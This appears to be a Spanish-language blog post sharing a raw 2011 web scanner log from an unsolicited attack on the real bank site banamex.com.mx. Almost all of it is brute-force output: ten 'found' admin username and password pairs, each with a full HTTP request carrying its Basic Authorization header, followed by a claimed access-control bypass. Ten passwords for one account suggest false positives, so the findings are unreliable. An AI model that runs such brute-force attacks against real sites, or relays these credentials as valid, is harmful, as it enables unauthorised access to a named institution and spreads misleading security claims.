Saludos Mundo Libre.
Me he puesto a jugar un rato y he encontrado esto hay se las dejo:
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.error500
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.getMails
[Mon 16 May 2011 11:22:11 AM CDT] Auto-enabling plugin: grep.lang
[Mon 16 May 2011 11:22:11 AM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 1108.
[Mon 16 May 2011 11:22:12 AM CDT] The page language is: en
[Mon 16 May 2011 11:22:12 AM CDT] The resource: "http://www.banamex.com.mx/" requires authentication. The realm is: "Basic realm="="". This information was found in the request with id 1113.
[Mon 16 May 2011 11:22:19 AM CDT] Starting formAuthBrute plugin execution.
[Mon 16 May 2011 11:22:19 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 16 May 2011 11:22:19 AM CDT] Starting basic authentication bruteforce on URL: "http://www.banamex.com.mx/".
[Mon 16 May 2011 11:22:19 AM CDT] No password profiling information collected, please try to enable webSpider plugin and try again.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 1160.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 1161.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 1162.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 1163.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 1164.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 1165.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 1166.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 1167.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 1168.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 1169.
[Mon 16 May 2011 11:22:22 AM CDT] Starting formAuthBrute plugin execution.
[Mon 16 May 2011 11:22:22 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 16 May 2011 11:22:22 AM CDT] Found 2 URLs and 2 different points of injection.
[Mon 16 May 2011 11:22:22 AM CDT] The list of URLs is:
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx/
[Mon 16 May 2011 11:22:22 AM CDT] The list of fuzzable requests is:
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx | Method: GET
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx/ | Method: GET
[Mon 16 May 2011 11:22:23 AM CDT] The resource: "http://www.banamex.com.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
[Mon 16 May 2011 11:22:23 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 1160.
[Mon 16 May 2011 11:22:23 AM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 1108.
[Mon 16 May 2011 11:22:23 AM CDT] The URL "http://www.banamex.com.mx/" has the following allowed methods: GET, HEAD, POST.
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 1160.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46MTIzYWJj
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0;
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 1161
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46cXdlcnR5
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 1162.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46YWJjZGU=
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 1163.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46cGE1NQ==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 1164.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46cWF6d3N4
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 1165.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46ZHJhZ29u
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 1166
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46NzNtcDEyMw==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 1168.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 1167.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46N2VtcA==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0
Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 1169.
GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46bm9wYXNzd29yZA==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.
htaccessMethods:
auth: Misconfigured access control: The resource: "http://www.banamex.com.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
Hay se las dejo.
Saludos Mundo Libre.
No hay comentarios:
Publicar un comentario